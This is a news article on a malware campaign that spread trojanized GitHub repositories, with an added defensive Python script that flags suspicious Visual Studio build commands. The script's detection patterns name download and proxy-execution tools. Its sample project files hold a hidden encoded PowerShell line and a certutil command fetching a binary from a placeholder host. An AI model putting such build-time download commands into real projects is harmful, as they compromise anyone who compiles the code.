GitHub Malware Campaign Targets Gamers and Developers with Trojanized Repositories

A major cybersecurity alert has surfaced, revealing that over 200 malicious GitHub repositories have been used in a coordinated malware campaign aimed at gamers and novice developers. These repositories masqueraded as open-source hacking tools and utilities but were actually embedded with trojanized payloads and backdoors, according to researchers at ReversingLabs.

Dubbed “Banana Squad”, the campaign builds upon a 2023 attack on the Python Package Index (PyPI), where rogue Python packages were downloaded over 75,000 times. The newer wave sees 67 GitHub repositories mimicking legitimate projects, such as Discord account cleaners, Fortnite cheats, TikTok tools, and PayPal bulk checkers, to lure unsuspecting users.

These malicious repositories were designed to install Python-based information stealers and other malware capable of targeting cryptocurrency wallets, such as Exodus, and exfiltrating sensitive data to external servers.

“Trojanized code and backdoors in open-source platforms like GitHub are now a rising software supply chain threat,” warned Robert Simmons from ReversingLabs.


GitHub’s Role in Malware Distribution

GitHub has become a central hub for distributing malware in recent campaigns:

  • Trend Micro identified 76 malicious repositories operated by a group dubbed Water Curse, which deploys multi-stage payloads to steal credentials, session tokens, and browser data.
  • Check Point exposed the Stargazers Ghost Network, a network of fake GitHub accounts pushing Java-based malware targeting Minecraft users.
  • These repositories often rely on artificial popularity using fake stars, forks, and subscriptions to rank higher in GitHub search results.

Wider Distribution-as-a-Service (DaaS) Threat

Researchers believe these campaigns are part of a larger Distribution-as-a-Service (DaaS) operation that has been active since August 2022, utilizing:

  • Discord servers
  • YouTube channels
  • Thousands of GitHub ‘ghost’ accounts

These DaaS networks often bait inexperienced cybercriminals looking for free malware tools, embedding trojans in downloadable source code.


Sophos: 133 Backdoored Repositories Discovered

Sophos also uncovered a repository named Sakura-RAT that deployed malware upon compilation. In total, at least 133 backdoored repositories were found:

  • 111 contained Visual Studio PreBuild backdoors
  • Others used Python scripts, JavaScript, and even screensaver files to compromise victims.
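The "PreBuild backdoor" pattern described above works because MSBuild runs any shell command listed in a project's pre- or post-build event the moment a victim hits Build, before the compiled program ever executes. A defender reviewing a cloned repository can therefore triage it by extracting those commands and checking them against a few well-known download-and-execute indicators. The script below is an added example written for this article, not code from ReversingLabs, Sophos, or any of the campaigns described; the indicator list is a generic heuristic (the article does not disclose the actual commands used), and all three project snippets are constructed samples.

```python
"""Extract pre/post-build commands from MSBuild project files and flag those that
look like they fetch, decode or launch a payload at compile time.

Handles three layouts: classic .csproj (<PreBuildEvent>text</PreBuildEvent>),
.vcxproj (<PreBuildEvent><Command>text</Command></PreBuildEvent>) and
SDK-style projects (<Target ...><Exec Command="..."/></Target>).
"""
import re
import xml.etree.ElementTree as ET

# Heuristic indicators chosen for this example; they are assumptions, not a list
# derived from the reported campaign. Tune them for your own environment.
SUSPICIOUS_PATTERNS = [
    r"powershell(\.exe)?\s+.*-(e|enc|encodedcommand)\b",   # encoded PowerShell
    r"-(w|windowstyle)\s+hidden",                           # hidden window
    r"\bcertutil\b.*-(decode|urlcache)",                    # LOLBin download/decode
    r"\b(curl|wget|bitsadmin|Invoke-WebRequest|iwr|DownloadString)\b",
    r"\b(mshta|regsvr32|rundll32)\b",                       # proxy execution
    r"FromBase64String",                                    # inline decoding
    r"https?://",                                           # any remote fetch
]
COMPILED = [re.compile(p, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS]


def _local(tag):
    """Strip the MSBuild XML namespace, e.g. '{http://...}Exec' -> 'Exec'."""
    return tag.rsplit("}", 1)[-1]


def extract_build_commands(project_xml):
    """Return a list of (location, command) for every build-time shell command."""
    root = ET.fromstring(project_xml.strip())
    found = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ("PreBuildEvent", "PostBuildEvent"):
            # .vcxproj nests the text in <Command>; classic .csproj uses element text.
            child = next((c for c in elem if _local(c.tag) == "Command"), None)
            text = (child.text if child is not None else elem.text) or ""
            if text.strip():
                found.append((tag, text.strip()))
        elif tag == "Exec":
            cmd = (elem.get("Command") or "").strip()
            if cmd:
                found.append(("Exec", cmd))
    return found


def flag_suspicious(commands):
    """Attach the matching indicator patterns to each command that trips one."""
    hits = []
    for location, cmd in commands:
        matched = [p.pattern for p in COMPILED if p.search(cmd)]
        if matched:
            hits.append({"location": location, "command": cmd, "indicators": matched})
    return hits


def scan_project(project_xml):
    """Full pipeline: parse project XML, return only the suspicious build commands."""
    return flag_suspicious(extract_build_commands(project_xml))


# --- constructed sample project files (not taken from any real repository) ---
BENIGN_VCXPROJ = """
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>copy "$(ProjectDir)config.json" "$(TargetDir)"</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>"""

SUSPECT_SDK_CSPROJ = """
<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -w hidden -enc QUJDRA==" />
  </Target>
</Project>"""

SUSPECT_OLD_CSPROJ = """
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>certutil -urlcache -split -f http://example.invalid/p.bin p.bin</PreBuildEvent>
  </PropertyGroup>
</Project>"""

if __name__ == "__main__":
    for name, xml in [("benign.vcxproj", BENIGN_VCXPROJ),
                      ("suspect-sdk.csproj", SUSPECT_SDK_CSPROJ),
                      ("suspect-old.csproj", SUSPECT_OLD_CSPROJ)]:
        for hit in scan_project(xml):
            print(f"{name}: {hit['location']} -> {hit['command']}")
            for ind in hit["indicators"]:
                print(f"    matched: {ind}")
```

Run it over every `*.csproj`, `*.vbproj` and `*.vcxproj` in a freshly cloned repository before opening the solution in Visual Studio; a project whose build events contain anything other than plain copy or code-generation steps deserves a manual read before the first build, since compilation itself is the trigger in this campaign.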

Malware observed in this campaign includes:

  • AsyncRAT
  • Remcos RAT
  • Lumma Stealer

These tools steal sensitive data, take screenshots, provide remote access, and download further malware—all without the victim’s knowledge.


What’s Next?

While the precise origins and coordination behind the campaign remain unclear, cybersecurity analysts believe that such attacks will continue to evolve and target wider groups beyond the current gaming and developer communities.

“The approach is both popular and effective. We may see the same tactics aimed at enterprises or open-source software developers in the future,” said Sophos.


Key Takeaways:

  • Over 200 GitHub repositories have been weaponized.
  • Malware targets include gamers, crypto users, and developers.
  • Threat actors are exploiting GitHub’s trust and visibility to deliver backdoors.
  • Users are urged to validate repositories carefully before use and to avoid downloading tools from unverified sources.
